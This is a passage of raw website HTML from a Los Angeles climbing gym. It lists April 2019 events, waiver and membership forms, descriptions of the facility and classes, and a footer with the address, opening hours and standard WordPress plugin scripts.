class="rhc-event-details rhc-description-empty"> <h3>Event</h3> <p class="rhc-description" itemprop="description">R.A.P (Rockreation Adaptive Program) is an ongoing program every Friday from 7:00 pm to 9:00 pm | If you would like to attend as a volunteer or participant please contact <a href="&#x6d;&#x61;&#x69;&#x6c;&#x74;&#x6f;&#x3a;&#x6a;&#x61;&#x6b;&#x65;&#x40;&#x72;&#x6f;&#x63;&#x6b;&#x72;&#x65;&#x61;&#x74;&#x69;&#x6f;&#110;&#46;&#99;&#111;&#109;">&#74;a&#x6b;e&#x40;r&#x6f;c&#x6b;r&#x65;a&#x74;&#105;&#x6f;&#110;.&#99;o&#x6d;</a> | Kid's specific adaptive program coming soon!</p> </div> <div class="btn-cta"></div> <div class="rhc-event-date-time"> <h3>Time of Event</h3> <div class="rhc-start-event"> <h4>Start</h4> <div class="rhc-day rhc-widget-date rhc_date fc-date-format" data-udate="1555700400" data-fc_date_format="MMM d, yyyy" data-wptz1="0" data-wptz2="">Apr 19, 2019</div> <div class="rhc-hour rhc-allday-hidden"><span class="rhc-icon-time"></span><span class="rhc-widget-time rhc_date fc-date-format" data-udate="1555700400" data-fc_date_format="h:mmtt" data-wptz1="0" data-wptz2="">7:00pm</span></div> </div> <div class="rhc-end-event"> <h4>End</h4> <div class="rhc-day rhc-widget-end-date rhc_date fc-date-format" data-udate="1555707600" data-fc_date_format="MMM d, yyyy" data-wptz1="0" data-wptz2="">Apr 19, 2019</div> <div class="rhc-hour rhc-allday-hidden"><span class="rhc-icon-time"></span><span class="rhc-widget-end-time rhc_date fc-date-format" data-udate="1555707600" data-fc_date_format="h:mmtt" data-wptz1="0" data-wptz2="">9:00pm</span></div> </div> </div> <div class="rhc-map-social-buttons"> <div class="rhc-left-buttons"> <a class="rhc-icon-map" alt="View Google Map" title="View Google Map" style="display: inline;"></a> <a class="rhc-icon-ical" title="Add to your calendar"></a> </div> <div class="rhc-right-buttons"> </div> </div> </div> <meta itemprop="startDate" content="2019-04-19T19:00:00"><meta itemprop="endDate" content="2019-04-19T21:00:00"></div> <div class="rhc-event-item rhc-widget-upcoming-item rhc-accordion-widget-item featured-0 rhc_top_image-imgset-0 rhc_dbox_image-imgset-0 rhc_tooltip_image-imgset-0 rhc_month_image-imgset-0" data-css_clear="opacity" style="opacity:0;" itemscope="" itemtype="http://schema.org/Event" data-post_id="52675"> <div class="rhc-widget-header" style="border-left: 5px solid #db0204;" data-fc_color="#db0204" data-fc_text_color=""> <div class="rhc-date with-end-date"> <div class="rhc-start-time"> <div class="rhc-start-month rhc-date-start rhc_date fc-date-format" data-udate="1555700400" data-fc_date_format="MMM" data-wptz1="0" data-wptz2="">Apr</div> <div class="rhc-start-daynumber rhc-date-start rhc_date fc-date-format" data-udate="1555700400" data-fc_date_format="dd" data-wptz1="0" data-wptz2="">19</div> </div> <div class="rhc-icon-dash if-different-date is-same-date">-</div> <div class="rhc-end-time if-different-date is-same-date"> <div class="rhc-end-month if-different-month rhc-date-end is-same-month rhc_date" data-udate="1555711200" data-fc_date_format="MMM" data-wptz1="0" data-wptz2="">Apr</div> <div class="rhc-end-daynumber rhc-date-end rhc_date" data-udate="1555711200" data-fc_date_format="dd" data-wptz1="0" data-wptz2="">19</div> </div> </div> <div class="rhc-title-info"> <a class="rhc-event-title rhc-title-link fc-event-list-title" href="https://rockreation-la.com/events/wow-women-of-the-wall/?event_rdate=20190419190000%2C20190419220000" itemprop="url">WOW: Women Of the Wall</a> <div class="rhc-title" itemprop="name">WOW: Women Of the Wall</div> <div class="rhc-time-location"> <div class="time rhc-allday-hidden"><span class="rhc-icon-time"></span><span class="rhc-widget-time rhc_date fc-date-format" data-udate="1555700400" data-fc_date_format="h:mmtt" data-wptz1="0" data-wptz2="">7:00pm</span></div> </div> </div> </div> <div class="rhc-widget-body"> <div class="rhc-event-details rhc-description-empty"> <h3>Event</h3> <p class="rhc-description" itemprop="description">Providing a space for women to grow and support each other in their climbing endeavors! | Participation included with membership or day pass | 7:00pm - 10:00pm Meet under the Arch |</p> </div> <div class="btn-cta"></div> <div class="rhc-event-date-time"> <h3>Time of Event</h3> <div class="rhc-start-event"> <h4>Start</h4> <div class="rhc-day rhc-widget-date rhc_date fc-date-format" data-udate="1555700400" data-fc_date_format="MMM d, yyyy" data-wptz1="0" data-wptz2="">Apr 19, 2019</div> <div class="rhc-hour rhc-allday-hidden"><span class="rhc-icon-time"></span><span class="rhc-widget-time rhc_date fc-date-format" data-udate="1555700400" data-fc_date_format="h:mmtt" data-wptz1="0" data-wptz2="">7:00pm</span></div> </div> <div class="rhc-end-event"> <h4>End</h4> <div class="rhc-day rhc-widget-end-date rhc_date fc-date-format" data-udate="1555711200" data-fc_date_format="MMM d, yyyy" data-wptz1="0" data-wptz2="">Apr 19, 2019</div> <div class="rhc-hour rhc-allday-hidden"><span class="rhc-icon-time"></span><span class="rhc-widget-end-time rhc_date fc-date-format" data-udate="1555711200" data-fc_date_format="h:mmtt" data-wptz1="0" data-wptz2="">10:00pm</span></div> </div> </div> <div class="rhc-map-social-buttons"> <div class="rhc-left-buttons"> <a class="rhc-icon-map" alt="View Google Map" title="View Google Map" style="display: inline;"></a> <a class="rhc-icon-ical" title="Add to your calendar"></a> </div> <div class="rhc-right-buttons"> </div> </div> </div> <meta itemprop="startDate" content="2019-04-19T19:00:00"><meta itemprop="endDate" content="2019-04-19T22:00:00"></div> <div class="rhc-event-item rhc-widget-upcoming-item rhc-accordion-widget-item featured-0 rhc_top_image-imgset-0 rhc_dbox_image-imgset-0 rhc_tooltip_image-imgset-0 rhc_month_image-imgset-0 fc-is-allday" data-css_clear="opacity" style="opacity:0;" itemscope="" itemtype="http://schema.org/Event" data-post_id="52677"> <div class="rhc-widget-header" style="border-left: 5px solid #db0204;" data-fc_color="#db0204" data-fc_text_color=""> <div class="rhc-date with-end-date"> <div class="rhc-start-time"> <div class="rhc-start-month rhc-date-start rhc_date fc-date-format" data-udate="1555891200" data-fc_date_format="MMM" data-wptz1="0" data-wptz2="">Apr</div> <div class="rhc-start-daynumber rhc-date-start rhc_date fc-date-format" data-udate="1555891200" data-fc_date_format="dd" data-wptz1="0" data-wptz2="">22</div> </div> <div class="rhc-icon-dash if-different-date is-same-date">-</div> <div class="rhc-end-time if-different-date is-same-date"> <div class="rhc-end-month if-different-month rhc-date-end is-same-month rhc_date" data-udate="1555891200" data-fc_date_format="MMM" data-wptz1="0" data-wptz2="">Apr</div> <div class="rhc-end-daynumber rhc-date-end rhc_date" data-udate="1555891200" data-fc_date_format="dd" data-wptz1="0" data-wptz2="">22</div> </div> </div> <div class="rhc-title-info"> <a class="rhc-event-title rhc-title-link fc-event-list-title" href="https://rockreation-la.com/events/earth-day-celebration/" itemprop="url">Earth Day Celebration</a> <div class="rhc-title" itemprop="name">Earth Day Celebration</div> <div class="rhc-time-location"> <div class="time rhc-allday-hidden fc-is-allday"><span class="rhc-icon-time"></span></div> </div> </div> </div> <div class="rhc-widget-body"> <div class="rhc-event-details rhc-description-empty"> <h3>Event</h3> <p class="rhc-description" itemprop="description">More Info Coming Soon!</p> </div> <div class="btn-cta"></div> <div class="rhc-event-date-time"> <h3>Time of Event</h3> <div class="rhc-start-event"> <h4>Start</h4> <div class="rhc-day rhc-widget-date rhc_date fc-date-format" data-udate="1555891200" data-fc_date_format="MMM d, yyyy" data-wptz1="0" data-wptz2="">Apr 22, 2019</div> <div class="rhc-hour rhc-allday-hidden fc-is-allday"><span class="rhc-icon-time"></span></div> </div> <div class="rhc-end-event"> <h4>End</h4> <div class="rhc-day rhc-widget-end-date rhc_date fc-date-format" data-udate="1555891200" data-fc_date_format="MMM d, yyyy" data-wptz1="0" data-wptz2="">Apr 22, 2019</div> <div class="rhc-hour rhc-allday-hidden fc-is-allday"><span class="rhc-icon-time"></span></div> </div> </div> <div class="rhc-map-social-buttons"> <div class="rhc-left-buttons"> <a class="rhc-icon-map" alt="View Google Map" title="View Google Map" style="display: inline;"></a> <a class="rhc-icon-ical" title="Add to your calendar"></a> </div> <div class="rhc-right-buttons"> </div> </div> </div> <meta itemprop="startDate" content="2019-04-22"><meta itemprop="endDate" content="2019-04-22"></div> <div class="rhc-event-item rhc-widget-upcoming-item rhc-accordion-widget-item featured-0 rhc_top_image-imgset-0 rhc_dbox_image-imgset-0 rhc_tooltip_image-imgset-0 rhc_month_image-imgset-0 fc-is-allday" data-css_clear="opacity" style="opacity:0;" itemscope="" itemtype="http://schema.org/Event" data-post_id="52164"> <div class="rhc-widget-header" style="border-left: 5px solid #DD0303;" data-fc_color="#DD0303" data-fc_text_color=""> <div class="rhc-date with-end-date"> <div class="rhc-start-time"> <div class="rhc-start-month rhc-date-start rhc_date fc-date-format" data-udate="1556236800" data-fc_date_format="MMM" data-wptz1="0" data-wptz2="">Apr</div> <div class="rhc-start-daynumber rhc-date-start rhc_date fc-date-format" data-udate="1556236800" data-fc_date_format="dd" data-wptz1="0" data-wptz2="">26</div> </div> <div class="rhc-icon-dash if-different-date is-same-date">-</div> <div class="rhc-end-time if-different-date is-same-date"> <div class="rhc-end-month if-different-month rhc-date-end is-same-month rhc_date" data-udate="1556236800" data-fc_date_format="MMM" data-wptz1="0" data-wptz2="">Apr</div> <div class="rhc-end-daynumber rhc-date-end rhc_date" data-udate="1556236800" data-fc_date_format="dd" data-wptz1="0" data-wptz2="">26</div> </div> </div> <div class="rhc-title-info"> <a class="rhc-event-title rhc-title-link fc-event-list-title" href="https://rockreation-la.com/events/college-night/?event_rdate=20190426000000%2C20190426000000" itemprop="url">College Night</a> <div class="rhc-title" itemprop="name">College Night</div> <div class="rhc-time-location"> <div class="time rhc-allday-hidden fc-is-allday"><span class="rhc-icon-time"></span></div> </div> </div> </div> <div class="rhc-widget-body"> <div class="rhc-event-details rhc-description-empty"> <h3>Event</h3> <p class="rhc-description" itemprop="description">College Night on every 4th Friday of each month! | All college students with a current college ID can purchase a $12 Day Pass and $5 Rentals!</p> </div> <div class="btn-cta"></div> <div class="rhc-event-date-time"> <h3>Time of Event</h3> <div class="rhc-start-event"> <h4>Start</h4> <div class="rhc-day rhc-widget-date rhc_date fc-date-format" data-udate="1556236800" data-fc_date_format="MMM d, yyyy" data-wptz1="0" data-wptz2="">Apr 26, 2019</div> <div class="rhc-hour rhc-allday-hidden fc-is-allday"><span class="rhc-icon-time"></span></div> </div> <div class="rhc-end-event"> <h4>End</h4> <div class="rhc-day rhc-widget-end-date rhc_date fc-date-format" data-udate="1556236800" data-fc_date_format="MMM d, yyyy" data-wptz1="0" data-wptz2="">Apr 26, 2019</div> <div class="rhc-hour rhc-allday-hidden fc-is-allday"><span class="rhc-icon-time"></span></div> </div> </div> <div class="rhc-map-social-buttons"> <div class="rhc-left-buttons"> <a class="rhc-icon-map" alt="View Google Map" title="View Google Map" style="display: inline;"></a> <a class="rhc-icon-ical" title="Add to your calendar"></a> </div> <div class="rhc-right-buttons"> </div> </div> </div> <meta itemprop="startDate" content="2019-04-26"><meta itemprop="endDate" content="2019-04-26"></div> <script class="rhc-supe-last" data-last_date_start="2019-04-26T00:00:00" data-last_date_end="2019-04-26T00:00:00"></script></div></div><div class="rhc-clear"></div><div class="supe-footer"></div></div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-6 vc_col-has-fill"><div class="vc_column-inner vc_custom_1454362224471"><div class="wpb_wrapper"> <div class="wpb_text_column wpb_content_element "> <div class="wpb_wrapper"> <h2 style="text-align: center;">FORMS</h2> </div> </div> <div class="vc_empty_space" style="height: 10px" ><span class="vc_empty_space_inner"><div class="empty_space_image" ></div> </span></div> <div class="wpb_text_column wpb_content_element "> <div class="wpb_wrapper"> <p style="text-align: center;"><em>All participants AND observers need a waiver.</em></p> <p style="text-align: center;"><strong><a href="https://rockreation-la.com/new-to-rockreation/">Age Requirements</a> | <a href="https://rockreation-la.com/new-to-rockreation/">New to Rockreation</a></strong> | <a href="https://rockreation-la.com/new-to-rockreation/"><strong>FAQ</strong></a></p> </div> </div> <div class="vc_empty_space" style="height: 30px" ><span class="vc_empty_space_inner"><div class="empty_space_image" ></div> </span></div> <a href="https://rockreation-la.com/online-waivers/" target="_self" class="qbutton big_large_full_width icon_right" style="font-weight: 700; ">WAIVERS</a> <div class="vc_empty_space" style="height: 15px" ><span class="vc_empty_space_inner"><div class="empty_space_image" ></div> </span></div> <a href="https://rockreation-la.com/wp-content/uploads/2016/02/Rockreation_Member_Change_Form.pdf" target="_self" class="qbutton big_large_full_width icon_right" style="font-weight: 700; ">MEMBERSHIP CHANGE FORM</a></div></div></div></div></div><svg class="oblique-section svg-bottom" preserveAspectRatio="none" viewBox="0 0 86 86" width="100%" height="86"><polygon points="0,0 0,86 86,0" style="fill:#f2f2f2;" /></svg></div><div class="vc_row wpb_row section grid_section" style=' padding-top:85px; padding-bottom:70px; text-align:center;'><div class=" section_inner clearfix"><div class='section_inner_margin clearfix'><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper"> <div class="wpb_text_column wpb_content_element "> <div class="wpb_wrapper"> <h2 style="text-align: center;">OUR COMMUNITY</h2> </div> </div> </div></div></div></div></div></div><div class="vc_row wpb_row section grid_section" style=' padding-bottom:20px; text-align:left;'><div class=" section_inner clearfix"><div class='section_inner_margin clearfix'><div class="wpb_column vc_column_container vc_col-sm-6"><div class="vc_column-inner"><div class="wpb_wrapper"><div class='edgt_icon_with_title normal_icon'><div class="icon_holder " style=" "><div class="icon_holder_inner"><div class="custom_icon"><img src=https://rockreation-la.com/wp-content/uploads/2015/01/ClimbIcon_Draw-e1440711559932.png></div></div></div><div class="icon_text_holder" style="padding-left: 60px;"><div class="icon_title_inner_holder"><h3 class="icon_title custom_icon_holder" style="color: #414a3b">Bouldering, Top-Roping, and Lead Facilities</h3></div><div class="icon_text_inner" style=""><p style=''></p></div></div></div><div class="separator transparent " style="margin-top:-20px"></div> <div class="wpb_text_column wpb_content_element "> <div class="wpb_wrapper"> <p>Rockreation endeavors to offer visitors and members variety in their training so you won&#8217;t see just one type of climbing in <a href="https://rockreation-la.com/facilities/"><strong>our facility</strong></a>. We offer bouldering, top-roping, and lead climbing with the instruction and guidance to encourage climbers to try a little of everything and the staff and expertise to help them become proficient.</p> </div> </div> <div class="separator transparent " style="margin-top:20px"></div> </div></div></div><div class="wpb_column vc_column_container vc_col-sm-6"><div class="vc_column-inner"><div class="wpb_wrapper"><div class='edgt_icon_with_title normal_icon'><div class="icon_holder " style=" "><div class="icon_holder_inner"><span class="edgt_font_elegant_holder normal " style="font-size: 30px;color: #414a3b;"><span aria-hidden="true" class="edgt_icon_font_elegant icon_compass_alt icon_text_icon edgt_font_elegant_icon " style="font-size: 30px;" ></span></span></div></div><div class="icon_text_holder" style="padding-left: 60px;"><div class="icon_title_inner_holder"><h3 class="icon_title " style="">State-of-the-art Fitness Center</h3></div><div class="icon_text_inner" style=""><p style=''></p></div></div></div><div class="separator transparent " style="margin-top:-20px"></div> <div class="wpb_text_column wpb_content_element "> <div class="wpb_wrapper"> <p>Our new <strong><a href="https://rockreation-la.com/facilities/">fitness area</a></strong>, just upstairs overlooking the bouldering and lead areas, is designed specifically for climbers to develop their cross-training, physical therapy or supplemental workouts. We understand the demands of climbing and cater to many different styles of workouts with our versatile and comprehensive selection of fitness equipment and tools. Not to mention our on site-personal trainers who are more than happy to help you with any climbing or non-climbing specific workouts and programming you may need!</p> </div> </div> <div class="separator transparent " style="margin-top:20px"></div> </div></div></div></div></div></div><div class="vc_row wpb_row section grid_section" style=' padding-bottom:60px; text-align:left;'><div class=" section_inner clearfix"><div class='section_inner_margin clearfix'><div class="wpb_column vc_column_container vc_col-sm-6"><div class="vc_column-inner"><div class="wpb_wrapper"><div class='edgt_icon_with_title normal_icon'><div class="icon_holder " style=" "><div class="icon_holder_inner"><div class="custom_icon"><img src=https://rockreation-la.com/wp-content/uploads/2015/01/fitness-weight-clipart-1-e1470678700665.jpg></div></div></div><div class="icon_text_holder" style="padding-left: 60px;"><div class="icon_title_inner_holder"><h3 class="icon_title custom_icon_holder" style="">Yoga and Fitness Classes</h3></div><div class="icon_text_inner" style=""><p style=''></p></div></div></div><div class="separator transparent " style="margin-top:-20px"></div> <div class="wpb_text_column wpb_content_element "> <div class="wpb_wrapper"> <p>To further our mission of providing a multi-disciplinary facility that centers around rock climbing, Rockreation offers a number of <a href="https://rockreation-la.com/yoga/"><strong>Yoga</strong></a> and <a href="https://rockreation-la.com/fitness-classes/"><strong>Fitness</strong></a> classes to help you round out your training! With several yoga styles, martial arts, dance and boot-camp-style fitness classes being offered, you&#8217;re sure to find a class that fits your schedule.</p> </div> </div> <div class="separator transparent " style="margin-top:20px"></div> </div></div></div><div class="wpb_column vc_column_container vc_col-sm-6"><div class="vc_column-inner"><div class="wpb_wrapper"><div class='edgt_icon_with_title tiny normal_icon'><div class="icon_holder " style=" "><div class="icon_holder_inner"><div class="custom_icon"><img src=https://rockreation-la.com/wp-content/uploads/2015/02/ClimbIcon_Shoe1-e1438301706248.png></div></div></div><div class="icon_text_holder" style="padding-left: 60px;"><div class="icon_title_inner_holder"><h3 class="icon_title custom_icon_holder" style="">Youth Classes, Camps &amp; Teams</h3></div><div class="icon_text_inner" style=""><p style=''></p></div></div></div><div class="separator transparent " style="margin-top:-20px"></div> <div class="wpb_text_column wpb_content_element "> <div class="wpb_wrapper"> <p>Rockreation knows that the climbing legacy doesn&#8217;t just start with adults discovering climbing for the first time, but also with <a href="https://rockreation-la.com/for-kids/"><strong>kids</strong></a>. It&#8217;s important that kids see how fun this sport can be but also recognize and respect the safety aspects of it as well. We offer a variety of youth programs with varying levels of involvement from a two-hour Kid&#8217;s Climb session to our nationally competitive <a href="http://rockreation.com/rockwarriors/"><strong>Rock Warriors Climbing Team</strong></a>! Host a <strong><a href="https://rockreation-la.com/birthdayparties/">birthday party</a></strong> with us or bring your kids to our famous <strong><a href="https://rockreation-la.com/climb-camp/">Climb Camp</a></strong>. Kids can continue learning and improving with us in whatever capacity you choose!</p> </div> </div> <div class="separator transparent " style="margin-top:20px"></div> </div></div></div></div></div></div><div class="vc_row wpb_row section " style='background-color:#3d5163; text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper"> <div class="vc_empty_space" style="height: 32px" ><span class="vc_empty_space_inner"><div class="empty_space_image" ></div> </span></div> <div class="call_to_action normal" style="background-color: #3d5163;border: 1px solid #ffffff;"><div class="container_inner"><div class="call_to_action_row_75_25 clearfix" style="padding: 20px;"><div class="text_wrapper to_action_column1 to_action_cell"><div class="call_to_action_text" ></p> <h2><span style="color: #ffffff;">SIGN UP FOR OUR NEWSLETTER</span></h2> <h4><span style="color: #ffffff;">TO GET THE LATEST NEWS AND PROMOTIONS AT ROCKREATION LA!</span></h4> <p></div></div><div class="button_wrapper to_action_column2 to_action_cell" style = "text-align: right"><a href="http://visitor.r20.constantcontact.com/manage/optin?v=001sBwXbNtx-Qcza0UgP-TXaVoG83M-GTpqCPR5c8Nt7q_6x-hQNnnxTF8EeV2y9pXE779Tvr_y-ZpcUBccmIueGO3wWNpVc1klAbu8AALyXi87yTlSKp0J6FWl2LF6EB1uVHvFblyKO8alOG_IEi7eCOSHkEgWO4izG1GoASY8R1TWdF7Bwobe3Q%3D%3D" class="qbutton " target="" >Learn More!</a></div></div></div></div> <div class="vc_empty_space" style="height: 32px" ><span class="vc_empty_space_inner"><div class="empty_space_image" ></div> </span></div> </div></div></div></div></div> </div> </div> </div> <!-- close div.content_inner --> </div> <!-- close div.content --> <footer > <div class="footer_inner clearfix"> <div class="footer_top_holder"> <div class="footer_top"> <div class="container"> <div class="container_inner"> <div class="four_columns clearfix"> <div class="edgt_column column1"> <div class="column_inner"> <div id="text-2" class="widget widget_text"><h4>OUR ADDRESS &#038; HOURS</h4> <div class="textwidget"><div class="separator transparent position_center " style="margin-top:35px"></div> 11866 La Grange Ave.<br/> Los Angeles, CA 90025 <br/> Front Desk: 310.207.7199 <br/> Email: See <a href="https://rockreation-la.com/contact/">Contact List</a><br/> <div class="separator transparent position_center " style="margin-top:30px"></div> <strong>Hours</strong><br/> Mon, Wed: Noon - 11pm<br/> Tues, Thurs: 6am - 11pm<br/> Fri: 6am - 10pm<br/> Sat, Sun: 10am - 6pm<br/></div> </div> </div> </div> <div class="edgt_column column2"> <div class="column_inner"> <div id="text-3" class="widget widget_text"><h4>PARKING INFO</h4> <div class="textwidget"><div class="separator transparent position_center " style="margin-top:30px"></div> </div> </div><div id="media_image-2" class="widget widget_media_image"><a href="https://rockreation-la.com/wp-content/uploads/2019/01/Rockreation_parkinginfo2.jpg"><img width="300" height="300" src="https://rockreation-la.com/wp-content/uploads/2019/01/Rockreation_parkinginfo2-300x300.jpg" class="image wp-image-52645 attachment-medium size-medium" alt="" style="max-width: 100%; height: auto;" srcset="https://rockreation-la.com/wp-content/uploads/2019/01/Rockreation_parkinginfo2-300x300.jpg 300w, https://rockreation-la.com/wp-content/uploads/2019/01/Rockreation_parkinginfo2-150x150.jpg 150w, https://rockreation-la.com/wp-content/uploads/2019/01/Rockreation_parkinginfo2-768x768.jpg 768w, https://rockreation-la.com/wp-content/uploads/2019/01/Rockreation_parkinginfo2-1024x1024.jpg 1024w, https://rockreation-la.com/wp-content/uploads/2019/01/Rockreation_parkinginfo2-610x610.jpg 610w, https://rockreation-la.com/wp-content/uploads/2019/01/Rockreation_parkinginfo2-550x550.jpg 550w, https://rockreation-la.com/wp-content/uploads/2019/01/Rockreation_parkinginfo2-1000x1000.jpg 1000w, https://rockreation-la.com/wp-content/uploads/2019/01/Rockreation_parkinginfo2-700x700.jpg 700w, https://rockreation-la.com/wp-content/uploads/2019/01/Rockreation_parkinginfo2.jpg 1515w" sizes="(max-width: 300px) 100vw, 300px" /></a></div><div id="text-12" class="widget widget_text"> <div class="textwidget"><p><a href="https://rockreation-la.com/contact/">Parking Info Details Here</a></p> </div> </div> </div> </div> <div class="edgt_column column3"> <div class="column_inner"> <div id="text-4" class="widget widget_text"><h4>Finding What You&#8217;re Looking For?</h4> <div class="textwidget">Need Information that you aren't finding on our website? Give us a call or send us an email to <a href="&#x6d;&#x61;&#x69;&#108;toi&#x6e;&#x66;&#x6f;&#x40;&#114;ock&#x72;&#x65;&#x61;&#116;&#105;on.&#x63;&#x6f;&#x6d;:">in&#x66;&#x6f;&#x40;ro&#99;&#x6b;&#x72;ea&#116;&#x69;&#x6f;n.&#99;&#x6f;&#x6d;</a>. <br> <br></div> </div><div id="nav_menu-5" class="widget widget_nav_menu"><h4>Not Looking for Los Angeles?</h4><div class="menu-more-links-container"><ul id="menu-more-links-1" class="menu"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-51326"><a href="http://www.rockreation-cm.com/">Rockreation &#8211; COSTA MESA</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-51327"><a href="http://climbrefuge.com/">Climbing REFUGE Las Vegas</a></li> </ul></div></div> </div> </div> <div class="edgt_column column4"> <div class="column_inner"> <div id="null-instagram-feed-2" class="widget null-instagram-feed"><h4>Instagram</h4><ul class="instagram-pics instagram-size-large"><li class=""><a href="//instagram.com/p/BwFluK_h_tk/" target="_blank" class=""><img src="//scontent-lax3-1.cdninstagram.com/vp/524e49d95621143090c84a9cc5f87039/5D40CC76/t51.2885-15/sh0.08/e35/s640x640/56168120_2223115824668801_1000782721589027353_n.jpg?_nc_ht=scontent-lax3-1.cdninstagram.com" alt="Grab your own Welly Bottle today! Only 5 left. #wellybottle #hydration" title="Grab your own Welly Bottle today! Only 5 left. #wellybottle #hydration" class=""/></a></li></ul><p class="clear"><a href="//instagram.com/rockreationla/" rel="me" target="_blank" class="">Follow Us</a></p></div> </div> </div> </div> </div> </div> </div> </div> <div class="footer_bottom_border_holder " style="height: 1px;background-color: #2f352b;"></div> <div class="footer_bottom_holder"> <div class="footer_bottom_holder_inner"> <div class="container"> <div class="container_inner"> <div class="column_inner"> <div class="textwidget"><span class="edgt_icon_shade edgt_icon_shortcode font_awesome normal " style="margin: 0 20px 0 0;"><a href="https://www.facebook.com/RockreationLA?fref=ts" target="_blank" style="color: #565952;" ><i class="edgt_icon_font_awesome fa fa-facebook " style="font-size: 23px;color: #565952;line-height:25px; " data-hover-color="#94907b" ></i></a></span><span class="edgt_icon_shade edgt_icon_shortcode font_awesome normal " style="margin: 0 0 0 0;"><a href="https://instagram.com/rockreation/" target="_blank" style="color: #565952;" ><i class="edgt_icon_font_awesome fa fa-instagram " style="font-size: 23px;color: #565952;line-height:25px; " data-hover-color="#94907b" ></i></a></span> <br></div> <div class="textwidget"><br>(c) Copyright 2018 Rockreation, LTD. | Webmaster <a href="http://www.rfscottimagery.com">RF Scott Imagery</a></div> </div> </div> </div> </div> </div> <div class="row_triangle row_triangle_top triangle_bkg " style="border-color:#ffffff"></div> </div> </footer> </div> <!-- close div.wrapper_inner --> </div> <!-- close div.wrapper --> <script type='text/javascript'> /* <![CDATA[ */ r3f5x9JS=escape(document['referrer']); hf4N='d04b49a9f40e111bf94e036aef7ca135'; hf4V='abe06ae67b835ec5190401badaaf8a02'; cm4S="form[action='https://rockreation-la.com/wp-comments-post.php']"; jQuery(document).ready(function($){var e="#commentform, .comment-respond form, .comment-form, "+cm4S+", #lostpasswordform, #registerform, #loginform, #login_form, #wpss_contact_form, .wpcf7-form";$(e).submit(function(){$("<input>").attr("type","hidden").attr("name","r3f5x9JS").attr("value",r3f5x9JS).appendTo(e);$("<input>").attr("type","hidden").attr("name",hf4N).attr("value",hf4V).appendTo(e);return true;});$("#comment").attr({minlength:"15",maxlength:"15360"})}); /* ]]> */ </script> <style type="text/css"> .ig_hide .wpcf7-response-output, .ig_form_container .screen-reader-response{ display: none !important; } .ig_show .ig_form_container.layout_bottom .wpcf7-response-output, .ig_show .ig_form_container.layout_right .wpcf7-response-output, .ig_show .ig_form_container.layout_left .wpcf7-response-output{ background-color: #FFF; color: #444; position: absolute; } .ig_sidebar .ig_form_bottom.ig_show .ig_form_container.layout_bottom .wpcf7-response-output{ bottom: 0; } .ig_overlay.ig_form_bottom.ig_show .ig_form_container.layout_bottom .wpcf7-response-output, .ig_action_bar.ig_bottom.ig_show .ig_form_container.layout_right .wpcf7-response-output, .ig_action_bar.ig_bottom.ig_show .ig_form_container.layout_left .wpcf7-response-output{ bottom: 100%; } </style> <script type="text/javascript"> jQuery(function() { jQuery( window ).on( "init.icegram", function(e, ig) { // Find and init all CF7 forms within Icegram messages/divs and init them if(typeof ig !== 'undefined' && typeof ig.messages !== 'undefined' ){ jQuery.each(ig.messages, function(i, msg){ jQuery(msg.el).find('form input[name=_wpcf7]').each(function(){ var form = jQuery(this).closest('form'); if(form && !form.hasClass('ig_form_init_done')){ if(form.closest('.ig_form_container').length > 0){ if(form.parent().find('.screen-reader-response').length == 0){ form.before('<div class="screen-reader-response"></div>') } if(form.find('wpcf7-response-output').length == 0){ form.append('<div class="wpcf7-response-output wpcf7-display-none"></div>') } form.closest('.ig_form_container').attr('id', form.find('input[name=_wpcf7_unit_tag]').val()); //_wpcf7_unit_tag } if(typeof _wpcf7 !== 'undefined'){ form.wpcf7InitForm(); }else{ form.submit( function( event ) { if ( typeof window.FormData !== 'function' ) { return; } wpcf7.submit( form ); event.preventDefault(); } ); } form.addClass('ig_form_init_done'); } }); }); } }); // init.icegram // Dismiss response text/div when shown within icegram form container jQuery('body').on('click', '.ig_form_container .wpcf7-response-output', function(e) { jQuery(e.target).slideUp(); }); // Handle CTA function(s) after successful submission of form jQuery( window ).on('wpcf7:mailsent', function(e) { if( typeof icegram !== 'undefined' ){ var msg_id = ((jQuery(e.target).closest('[id^=icegram_message_]') || {}).attr('id') || '').split('_').pop() || 0 ; var ig_msg = icegram.get_message_by_id(msg_id) || undefined; if(ig_msg && ig_msg.data.cta === 'form_via_ajax' && ig_msg.data.cta_option_form_via_ajax == 'hide_on_success'){ setTimeout(function(){ ig_msg.hide(); }, 2000); } } }); }); </script> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"https:\/\/rockreation-la.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"}}; /* ]]> */ </script> <script type='text/javascript' src='https://rockreation-la.com/wp-content/plugins/contact-form-7/includes/js/scripts.js'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-content/plugins/bloom/js/jquery.uniform.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var bloomSettings = {"ajaxurl":"https:\/\/rockreation-la.com\/wp-admin\/admin-ajax.php","pageurl":"https:\/\/rockreation-la.com\/","stats_nonce":"6c458861ca","subscribe_nonce":"fdb2b29014"}; /* ]]> */ </script> <script type='text/javascript' src='https://rockreation-la.com/wp-content/plugins/bloom/js/custom.js'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-content/plugins/bloom/js/idle-timer.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var edgtLike = {"ajaxurl":"https:\/\/rockreation-la.com\/wp-admin\/admin-ajax.php"}; /* ]]> */ </script> <script type='text/javascript' src='https://rockreation-la.com/wp-content/themes/vigor/js/edgt-like.js'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-content/themes/vigor/js/plugins.js'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-content/themes/vigor/js/jquery.carouFredSel-6.2.1.js'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-content/themes/vigor/js/jquery.fullPage.min.js'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-content/themes/vigor/js/lemmon-slider.js'></script> <script type='text/javascript' src='https://rockreation-la.com/wp-content/themes/vigor/js/jquery.mousewheel.min.js'></script> <script type='text/javascript' 